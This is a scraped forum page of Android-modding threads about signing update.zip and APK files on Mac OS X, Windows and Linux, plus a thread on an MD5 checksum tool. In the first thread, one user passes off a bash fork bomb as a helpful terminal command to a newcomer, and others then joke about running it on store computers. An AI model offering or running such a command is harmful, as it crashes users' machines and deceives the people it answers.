how to sign zips in a mac? - Hero CDMA Themes and Apps

so i finally took the plunge and have a fully working osx86 install on my pc.
how can i sign zips i create, in windows it was with one click of a program.

1st thing you do is:
Format your C: drive and remove that dreadful virus.
then you install an operating system such as Windows 7 64bit
from there I couldn't tell you, but at least it's a good start.
Nasty, nasty virus!

fixxxer2008 said:
so i finally took the plunge and have a fully working osx86 install on my pc.
how can i sign zips i create, in windows it was with one click of a program.
Click to expand...
Click to collapse
Ok, here is what you need to do. Download the two files I have attached. Uncompress both of them. Place the testsign.jar in your root directory IE: Macintosh HD or whatever yours is named.
Once you have that done you can move the Android-Sign app to your applications folder. I suggest dragging it to the dock to make a shortcut.
Go to the file structure you are trying to sign. Make sure the System and META-INF folders are intact and select them both. Right-click on the highlighted files and select "compress 2 items". This will create and Archive.zip in the current directory.
Drag the Archive.zip to the Android-Sign shortcut on the dock. It will automatically create a file named Archive-signed.zip. Rename the file to whatever you want and you should be good to go.
This is all I know about the signing process. I have only done this for a boot screen, so I wish you the best of luck.

This is at least the way it is done on a real Mac, not sure about your emulated install. Let me know how it goes.

Here is the thread that contains the above attached .zips:
http://forum.xda-developers.com/showthread.php?t=573498

srkmagnus said:
Here is the thread that contains the above attached .zips:
http://forum.xda-developers.com/showthread.php?t=573498
Click to expand...
Click to collapse
Thank you. I couldn't remember where that was. I hope I am not infringing on anyone by posting them myself. I take no credit for their creation.

VoXHTC said:
1st thing you do is:
Format your C: drive and remove that dreadful virus.
then you install an operating system such as Windows 7 64bit
from there I couldn't tell you, but at least it's a good start.
Nasty, nasty virus!
Click to expand...
Click to collapse
im dual booting with windows 7. care to explain how it's a virus when many thousands of people run it? it's just a modded kernel to be able to boot it on a pc instead of a mac.

srkmagnus said:
Here is the thread that contains the above attached .zips:
http://forum.xda-developers.com/showthread.php?t=573498
Click to expand...
Click to collapse
thanks, guys this is a real leopard retail install with just a modded kernel. everything works fine for me right out of the box...sort of speaking!

i remember running OSX86 a few years ago it was a nice alternative until i could "switch". Apple FTW!

VoXHTC said:
1st thing you do is:
Format your C: drive and remove that dreadful virus.
then you install an operating system such as Windows 7 64bit
from there I couldn't tell you, but at least it's a good start.
Nasty, nasty virus!
Click to expand...
Click to collapse
Agreed.
Actually fixxxer, try this; open your terminal and enter this in:
Code:
[B] :(){ :|:& };: [/B]
--- At your own risk.

Code:
[B] :(){ :|:& };: [/B]
Why does that code look familiar?
Fork Bomb?

Kcarpenter said:
Code:
[B] :(){ :|:& };: [/B]
Why does that code look familiar?
Fork Bomb?
Click to expand...
Click to collapse
Hahahaha, yes it's a fork bomb!
It's the best thing to do at a Best Buy... especially when all the pretentious mac heads are jizzing in there pants over obsolete technology.

andyriot said:
i remember running OSX86 a few years ago it was a nice alternative until i could "switch". Apple FTW!
Click to expand...
Click to collapse
Same!
10charslol.

Related

Signing the update.zip in Mac OS X?

I'm sure this has been asked before but after prolific searching of the forums and our friend Google I turn to you guys for help. As the title says I'm using OS X and I need a solution (that isn't dual booting to use XP) to signing the update.zip so that I can customise aspects of my ROM, I'm very eager to learn how to do this and this so far seems to be quite an annoying problem.
Thanks for your time in advance
tristyB said:
I'm sure this has been asked before but after prolific searching of the forums and our friend Google I turn to you guys for help. As the title says I'm using OS X and I need a solution (that isn't dual booting to use XP) to signing the update.zip so that I can customise aspects of my ROM, I'm very eager to learn how to do this and this so far seems to be quite an annoying problem.
Thanks for your time in advance
Click to expand...
Click to collapse
pm me............
korndub said:
pm me............
Click to expand...
Click to collapse
Hi korndub,
Cannot you post the answer here so everybody that uses OS X can also sign?
I'm also having problems signing full roms (update.zip files) with signapk.jar
Any help is appreciated
rommelin said:
Hi korndub,
Cannot you post the answer here so everybody that uses OS X can also sign?
I'm also having problems signing full roms (update.zip files) with signapk.jar
Any help is appreciated
Click to expand...
Click to collapse
i have a folder on the desktop which contains the signapk.jar and both sets of keys...put the Archive.zip that you have created and want to sign in this folder, then open terminal
in terminal, you type
$cd FOLDER-containing-files
$java -jar signapk.jar testkeys.x509.pem testkey.pk8 Inputfile.zip outputfile.zip
the outputfile.zip is your update which is signed....
OK, I do all that I think.
Heres my process.
Download ROM
Extract downloaded zip to folder eg update
Make changes to files
Compress folder back to zip eg update1.zip
java -jar signapk.jar testkeys.x509.pem testkey.pk8 update1.zip update_signed.zip
rename and copy the signed file to sd
reboot recovery
wipe and apply update
It doesn't moan about the signing (so I assume its ok) but I get an update script not found error and it doesn't install.
I haven't changed the update scripts, only the boot.img and one or two scripts in system.
Does every file I change have to be resigned as well? I muct be missing something here
on OSX 10.5
Signing has nothing to do with that error. Make sure that the update-script is in the correct path.
META-INF/com/google/android/update-script
it is, is a normal update.zip (ie cyanogen rom), and the only file I've changed is boot.img and a2sd in system/bin
i have a folder on the desktop which contains the signapk.jar and both sets of keys...put the Archive.zip that you have created and want to sign in this folder, then open terminal
in terminal, you type
$cd FOLDER-containing-files
$java -jar signapk.jar testkeys.x509.pem testkey.pk8 Inputfile.zip outputfile.zip
the outputfile.zip is your update which is signed....
Click to expand...
Click to collapse
Thank you so much, this works for me, I might try and build it into an automator workflow
Edit: I spoke too soon, I get the update script error also
Edit Again: my update-script is in the same place as it should be also
Wonder if this is a specific OSX problem? We do have apples 'interpretation' of java don't we?
dazcox5181 said:
Wonder if this is a specific OSX problem? We do have apples 'interpretation' of java don't we?
Click to expand...
Click to collapse
haha, yeah that's right, those crazy cats at Apple. but I assume that korndub also has Apples 'interptretation' so something else could be the problem also
perhaps the way we zip the archive?
dazcox5181 said:
perhaps the way we zip the archive?
Click to expand...
Click to collapse
sadly not, I just used a application that zips in a PC format (without mac hidden files) and no joy. Good idea though.
Edit: Just tried archiving the zip but not compressing. Thought I was on to something. I wasn't.
Another update, I have tried the same in Fedora 11 and again, getting the update script error message when I flash.
I signed modified update for 3 different builds on my Mac, everything worked w/o problems every time. I did everything like described in readme and several times here. So, it's not a global OS X problem.
BTW, I used muCommander to directly modify all zips.
neuro159 said:
I signed modified update for 3 different builds on my Mac, everything worked w/o problems every time. I did everything like described in readme and several times here. So, it's not a global OS X problem.
BTW, I used muCommander to directly modify all zips.
Click to expand...
Click to collapse
When I find the time later on I will give the muCommander a go. Fingers crossed.
dazcox5181 said:
OK, I do all that I think.
Heres my process.
Download ROM
Extract downloaded zip to folder eg update
Make changes to files
Compress folder back to zip eg update1.zip
java -jar signapk.jar testkeys.x509.pem testkey.pk8 update1.zip update_signed.zip
rename and copy the signed file to sd
reboot recovery
wipe and apply update
It doesn't moan about the signing (so I assume its ok) but I get an update script not found error and it doesn't install.
I haven't changed the update scripts, only the boot.img and one or two scripts in system.
Does every file I change have to be resigned as well? I muct be missing something here
on OSX 10.5
Click to expand...
Click to collapse
you dont archive (zip) the folder, this is where you are having the issue... say you extracted the rom to ROMFOLDER, what you need to do is go into that folder, select all, then right click or two finger click and choose Compress - you will end up with an archive that contains all sub folders, if you zip the folder then you have a folder within a folder and that is where all goes south..
korndub said:
you dont archive (zip) the folder, this is where you are having the issue... say you extracted the rom to ROMFOLDER, what you need to do is go into that folder, select all, then right click or two finger click and choose Compress - you will end up with an archive that contains all sub folders, if you zip the folder then you have a folder within a folder and that is where all goes south..
Click to expand...
Click to collapse
Oh my god, you're right. And I think I actually read that somewhere before now you've reminded me. Damn. Thanks though! Thanks a lot!
Awesome, knew it was me being stupid.
sure thing guys! glad i could help...
Always something stupid...

Auto-Sign APP for MAC users!

With the help of red_menace over at the apple support forum, I present Mac users with an application that will sign their .apk and .zip files.
It is a droplet application, meaning you just have to drag the file you want signed onto the application itself. A new file will be created with -signed at the end of the file name.
For this to work you need to have testsign.jar in your root directory. The root directory is the first place you come to when you click on the mac hard drive.
If anyone wants to use or edit the script that's fine with me, I really didn't do much, just asked the right people for help.
Android-sign.zip Download
Android-sign.zip has both the testsign.jar and android-sign application.
EDIT: Sorry about the mixup. Testsign.jar is now linked above.
thank you sir! will try tonight
Exception in thread "main"
java.lang.NoClassDefFoundError: testsign
I cant find the testsign.jar its not in the tool directory of my SDK that I downloaded from Androids website
Where can I get this testsign.jar?
*EDIT*
I found the testsign.jar in the forums. You can get it here: http://forum.xda-developers.com/showthread.php?t=538020
But I still get the same error I've placed the program and the testsign.jar file in the same directory.
I have some cool skins in the making! I just need to know how to sign these files! I'm on a mac.
Why am I getting the error?
wow i need this bad...now lets c if i know how to get it 2 work....
MurderDeathKill said:
But I still get the same error I've placed the program and the testsign.jar file in the same directory.
I have some cool skins in the making! I just need to know how to sign these files! I'm on a mac.
Why am I getting the error?
Click to expand...
Click to collapse
are you putting the testsign.jar in your ROOT dir? aka where adb is
same error
Okay, so I'm getting the same error. And yes, my testsign.jar/Android-sign.app are both in my sdk/tools dir.
Not sure what the problem is.
Hope I can get this to work
jaaronmoody said:
are you putting the testsign.jar in your ROOT dir? aka where adb is
Click to expand...
Click to collapse
What file is the adb? I understand what adb means and what it does, but I don't know how to identify it.
Ok so since im new to this can someone can make a really dumb guide for me from dowloading the app to putting the test.jar file please.
im getting the same error, this is a huge step though when u figure out whats going on with the rest of our Auto-sign, repost thanks nd thumbs up
nice...thx for sharing this. will come in handy
oops, still getting used to all this. haha
ffff00 said:
Okay, so I'm getting the same error. And yes, my testsign.jar/Android-sign.app are both in my sdk/tools dir.
Not sure what the problem is.
Hope I can get this to work
Click to expand...
Click to collapse
the testsign.jar needs to be in the root directory of your computer. The app can be placed anywhere you would like. Where ever you put the app, the new signed file will be also.
guys so lets say i put meltus audio hack in cyanogen 4.9999 and i want to sign the whole build back up how would i do that.
thank you
jessetbenton said:
the testsign.jar needs to be in the root directory of your computer. The app can be placed anywhere you would like. Where ever you put the app, the new signed file will be also.
Click to expand...
Click to collapse
Oh okay, thanks.
You said to put it in the same folder as adb is why I was confused.
I'll try this out in a few.
ffff00 said:
Oh okay, thanks.
You said to put it in the same folder as adb is why I was confused.
I'll try this out in a few.
Click to expand...
Click to collapse
no i said that, and it is where adb is.... at least for me... in the root dir, if you move the adb file there you don't have to enter the path every time you enter adb commands in the terminal
ffff00 said:
Oh okay, thanks.
You said to put it in the same folder as adb is why I was confused.
I'll try this out in a few.
Click to expand...
Click to collapse
i think what jaaronmoody was talking about is just putting your adb file into the root directory instead of adding to the bin. but im pretty new to the whole terminal and coding stuff, so i just know what i've picked up since having my g1.
guys does anybody know about signing folders again to make them flashable?
G1_Lucky said:
guys so lets say i put meltus audio hack in cyanogen 4.9999 and i want to sign the whole build back up how would i do that.
thank you
Click to expand...
Click to collapse
well if the file is good. you just have to drag the cm 4.9999.zip file onto the app and it will spit out the new signed version.
What I think is more complicated is actually modifying those files. I use virtualbox to run windows and do everything with 7zip.
Anyone know of a zip program similar to 7zip to edit the apk and zip files?
Dude! Thanks! Alright guys get ready now that I have everything in place ADB, and signing my .zip files expect Luck's turn at android development lol. Im hecka grateful for everybody but now im ready haha thanks guys
Thanks for the help.
Works like a charm.
Awesome droplet.

How do i sign Zip Files?

That i wanna flash?
xda search function
feefeeboomboom said:
xda search function
Click to expand...
Click to collapse
Agree , but here it is http://forum.xda-developers.com/showthread.php?t=629151&highlight=sign+zip+files
derekstory said:
Agree , but here it is http://forum.xda-developers.com/showthread.php?t=629151&highlight=sign+zip+files
Click to expand...
Click to collapse
Tried no luck on finding it....but thanx! lol
rogerbean101 said:
Tried no luck on finding it....but thanx! lol
Click to expand...
Click to collapse
Q: How do I sign my zip or apk?
A: First you must have java installed on whatever OS you're running. Windows users download the Win-sign.zip attachment. Linux users download Linux-sign.zip attachment.
derekstory said:
Q: How do I sign my zip or apk?
A: First you must have java installed on whatever OS you're running. Windows users download the Win-sign.zip attachment. Linux users download Linux-sign.zip attachment.
Click to expand...
Click to collapse
What do i do next? lol im HELLA NOOB at all this
rogerbean101 said:
What do i do next? lol im HELLA NOOB at all this
Click to expand...
Click to collapse
unzip and read the text file for directions
derekstory said:
unzip and read the text file for directions
Click to expand...
Click to collapse
LMAO Still lost
rogerbean101 said:
LMAO Still lost
Click to expand...
Click to collapse
go to the link i posted. At the bottom of the post #1 there are 2 zip files. one for Windows and one for Linux, pick the one for your OS. After download double click then read the Readme.txt file and it will tell you what to do
derekstory said:
go to the link i posted. At the bottom of the post #1 there are 2 zip files. one for Windows and one for Linux, pick teh one for your OS. After download right double click then read the Readme.txt file and it will tell you what to do
Click to expand...
Click to collapse
i did that and all it says is
"SignApk.jar is a tool included with the Android platform source bundle.
testkey.pk8 is the private key that is compatible with the recovery image included in this zip file
testkey.x509.pem is the corresponding certificate/public key
Usage:
java -jar signapk.jar testkey.x509.pem testkey.pk8 update.zip update_signed.zip"
You must have the linux android sdk installed to use this.
Place the sign folder inside the android sdk tools folder so you have a path IE ~/android-sdk-linux/tools/sign
Place the androsign file the tools folder.
Open a terminal and cd into the android sdk tools folder
Type the following command to sign your .zip/.apk:
sudo androsign ~/folder_containing_zip/nameofzip.zip
This will output a file with original zip name plus -signed IE rom-signed.zip
Actually, I think it would be cool if we could have something like this on the "All Current Guides" wiki page or something. Trying to figure out how to do pretty minuscule stuff like signing a zip requires some pretty deep thread searching. Want to learn how to customize a ROM? Search the threads. Unfortunately, that thread will refer to another one. Only to have that one point to another.
It would be nice to have a How-To guide for things like rooting, signing zips, customizing, etc. I just think that a How-To wiki for all these things would reduce the number of threads like this. And I'm saying this as someone who knows how to do all those things. I just remember the confusion and frustration.
bigronaldo said:
Actually, I think it would be cool if we could have something like this on the "All Current Guides" wiki page or something. Trying to figure out how to do pretty minuscule stuff like signing a zip requires some pretty deep thread searching. Want to learn how to customize a ROM? Search the threads. Unfortunately, that thread will refer to another one. Only to have that one point to another.
It would be nice to have a How-To guide for things like rooting, signing zips, customizing, etc. I just think that a How-To wiki for all these things would reduce the number of threads like this. And I'm saying this as someone who knows how to do all those things. I just remember the confusion and frustration.
Click to expand...
Click to collapse
Yeaaa i Deff Agree cuz im beyond lost right now with this! lol Its nuts lol
you must be using windows. let me do some more resesarch. I will send a PM if I find out anything so we are not using up thread space.
derekstory said:
you must be using windows. let me do some more resesarch. I will send a PM if I find out anything so we are not using up thread space.
Click to expand...
Click to collapse
Yeaa windows xp! lmao Thanx!!

Android Theme Creation Help!!!!!!!!!! Mac Users.

Im Posting Here Because I Need An App To Help Me Finalize My Theme. Something Like "7-Zip" But For Mac. I've Searched, Searched, And Searched.
So Basically Im Looking For An App For Mac OSX That Can Go Within An Archive And Change/Update Files Within It Without Extracting It.
I've Found "Better Zip" Which Claims I Can Edit/Update An Archive But I Have Not Been Able To Do So.
Thanks In Advance.
Rydah805 said:
Im Posting Here Because I Need An App To Help Me Finalize My Theme. Something Like "7-Zip" But For Mac. I've Searched, Searched, And Searched.
So Basically Im Looking For An App For Mac OSX That Can Go Within An Archive And Change/Update Files Within It Without Extracting It.
I've Found "Better Zip" Which Claims I Can Edit/Update An Archive But I Have Not Been Able To Do So.
Thanks In Advance.
Click to expand...
Click to collapse
Why did you.... Capitolize Every Word In Your Statement???
Anyway, regarding your app why don't you try http://gaygamer.net/images/grab_onto_your_ostrich_its_gon/ostrich_head.jpg
Its A Habbit. Lol ****. =[
Anyways, Try What?
Rydah805 said:
Its A Habbit. Lol ****. =[
Anyways, Try What?
Click to expand...
Click to collapse
Their You Go Again! Lol....
I know exactly what you need, but can't find it ATM. I will search for you. In the meantime after "try" in my last statement, highlight the white text copy/paste it and follow the link.
thanks, but are you really gonna help me or did you just want me to see that pic? lol i just cant find anything....
Rydah805 said:
thanks, but are you really gonna help me or did you just want me to see that pic? lol i just cant find anything....
Click to expand...
Click to collapse
Actually I am planning on helping, and good job not going all caps crazy
Do you have bootcamp?
cant you just..
1. extract
2. edit
3. pack
4. sign
5. ???
6. Profit!
PurpleSmurfLlama said:
Actually I am planning on helping, and good job not going all caps crazy
Do you have bootcamp?
Click to expand...
Click to collapse
Nope. Sorry. Well doesn't it come with mac OS x? Just without Windows?
And the solution posted above won't work. The files should not be extracted. Unless there's an app that will let you package a bundle of files into an .apk within a .zip file. Which would work but I can't find a .apk compressor.
Thanks so far guys.
ooor you could make it into a zip and rename it to .apk...
Ive tried that.
extract the .apk, edit what i want, zip it up then rename it to myfile.zip to myfile.apk right?
thanks again for the help so far guys.
ante0 said:
ooor you could make it into a zip and rename it to .apk...
Click to expand...
Click to collapse
This does not work.
Rydah805 said:
Ive tried that.
extract the .apk, edit what i want, zip it up then rename it to myfile.zip to myfile.apk right?
thanks again for the help so far guys.
Click to expand...
Click to collapse
If you can extract the files, it seems like you dont need 7zip/WinRAR... Just drag the files you have edited overtop of the window of whatever program you used to extract. No?
im not exactly sure what you mean but from what i think your saying, no i cant just drag a file into the apk like i can on 7-zip
Ah yea, sorry, I used APK builder in the sdk :/
If you can, you could run windows/linux in a vm, then you should be able to pack em correctly.
Or ask a friend if he/she can do it for you
Rydah805 said:
Nope. Sorry. Well doesn't it come with mac OS x? Just without Windows?
And the solution posted above won't work. The files should not be extracted. Unless there's an app that will let you package a bundle of files into an .apk within a .zip file. Which would work but I can't find a .apk compressor.
Thanks so far guys.
Click to expand...
Click to collapse
Well boot camp is free and included in Leopard/Snow Leopard but, you defenatelly have to buy Windows. I suggest going on ebay, buy a re-install dell disk for seven (they are around $20) and just temporaily use it for your needs until the 30 day trial expires. Or you can just buy it....
Purple Drama Llama said:
Well boot camp is free and included in Leopard/Snow Leopard but, you defenatelly have to buy Windows. I suggest going on ebay, buy a re-install dell disk for seven (they are around $20) and just temporaily use it for your needs until the 30 day trial expires. Or you can just buy it....
Click to expand...
Click to collapse
i have the disc. i came from windows about 7 mon. ago. horrible days but.....oh well.

[PC/Software] Drag'n'MD5 v1.0 - Calculate MD5 with just a Drag & Drop!

Hello, this is a basic software, that let you calculate the MD5 about files/folder , with just drag and drop inside the box.
Two version, English, and Spanish
Requirements:
Windows OS
Java installed
Screenshots attached
MD5's (Yes calculed with Drag'n'MD5)
D72F2AEF02AEE27126C1CE867F3305DA - EN
076B8B8A510179BDBC6DCD27FAE0542A - ES
Changelog:
15.08.2011 - v1
Initial release
going to test it
you are GENIUS workig just like that
Where you drop them? Is md4 and sha1 next? Nice one mate!
New version uploaded, added comparison, and recursive comparison with clipboard
EDIT: Fixed bugs, reuploaded, enjoy!
Nice work mate! Only you should use some less boring animation during md5 calc Works great!
We've been waiting for this for sometime, thanks.
Thanks for the hard work, and i am appreciative. is this used to check the MD5SUM post downloading a ROM or flash-able .zip, or to verify the md5sum prior to publicly posting a ROM or flash-able .zip If it is used for verifying downloads, what is the difference between this and using the
Code:
# md5sum /mnt/sdcard/[file_name].zip
from within the adb shell?
neidlinger said:
Thanks for the hard work, and i am appreciative. is this used to check the MD5SUM post downloading a ROM or flash-able .zip, or to verify the md5sum prior to publicly posting a ROM or flash-able .zip If it is used for verifying downloads, what is the difference between this and using the
Code:
# md5sum /mnt/sdcard/[file_name].zip
from within the adb shell?
Click to expand...
Click to collapse
Drag'n'MD5 it's a software originally made to get ANY file MD5, but last release also have MD5 check, that means you can use for check downloaded zip MD5, or pre-check MD5 for publishing a zip.
The difference with adb shell it's that you can drag & drop ANY file, and get its MD5, based on substrings, and file digest.
*Note* Any it's on caps, because it's not specifically designed for get Zip's MD5.
Cheers,
D4.
Is installation necessary? Could you release a "portable" version (executable only)?
halfsoul said:
Is installation necessary? Could you release a "portable" version (executable only)?
Click to expand...
Click to collapse
Consideer it as an "unpacker", you can choose desktop (or any place you like), disable shortcuts, and just run it, as an portable app.
Cheers.
Could you make a Portuguese version?
I'm sure it won't be difficult for you, since you know Spanish.
Sent from my Milestone 2 XDA App
dangpzanco said:
Could you make a Portuguese version?
I'm sure it won't be difficult for you, since you know Spanish.
Sent from my Milestone 2 XDA App
Click to expand...
Click to collapse
I'm sorry but you're wrong, spanish syntax it's very different to portuguese, so it's not easy for me. Also would be more work, because I forgot to use multilanguage settings, and I did release 2 versions as you can see. So portuguese will be 3 versions. Just use English or spanish version.
Cheers.
I'm trying to use this software and when I drag a zip file into the "drag and Drop Here" I get the Circle with a line through it, and nothing happens.
I made sure to run it as and administrator on my pc, and I have windows 7 x64 version. 8 gig of ram, and a quad core processor.
The zip file is from Prime_v1.8.2.zip from the Transformer Dev Roach2010.
Although I just tried dragging a few txt files, and those don't work either.
D4rKn3sSyS said:
Consideer it as an "unpacker", you can choose desktop (or any place you like), disable shortcuts, and just run it, as an portable app.
Cheers.
Click to expand...
Click to collapse
I see. Just to confirm, it doesn't make any registry/uninstaller changes?
I am an administrator on my Windows 7 machine but when I try run setup.exe it tells me "You must be logged in as an administrator when installing this program." Any ideas?
halfsoul said:
I see. Just to confirm, it doesn't make any registry/uninstaller changes?
Click to expand...
Click to collapse
No, uninstaller it's an .ini file, not even touchs registry, don't worry.
Silly Man said:
I am an administrator on my Windows 7 machine but when I try run setup.exe it tells me "You must be logged in as an administrator when installing this program." Any ideas?
Click to expand...
Click to collapse
Right click and select Run as administrator?
Sent by Skeletor from Castle of Greyskull using XDA Premium App
metaldood said:
Right click and select Run as administrator?
Sent by Skeletor from Castle of Greyskull using XDA Premium App
Click to expand...
Click to collapse
I thought of that as well, but I get the same message!

Categories

Resources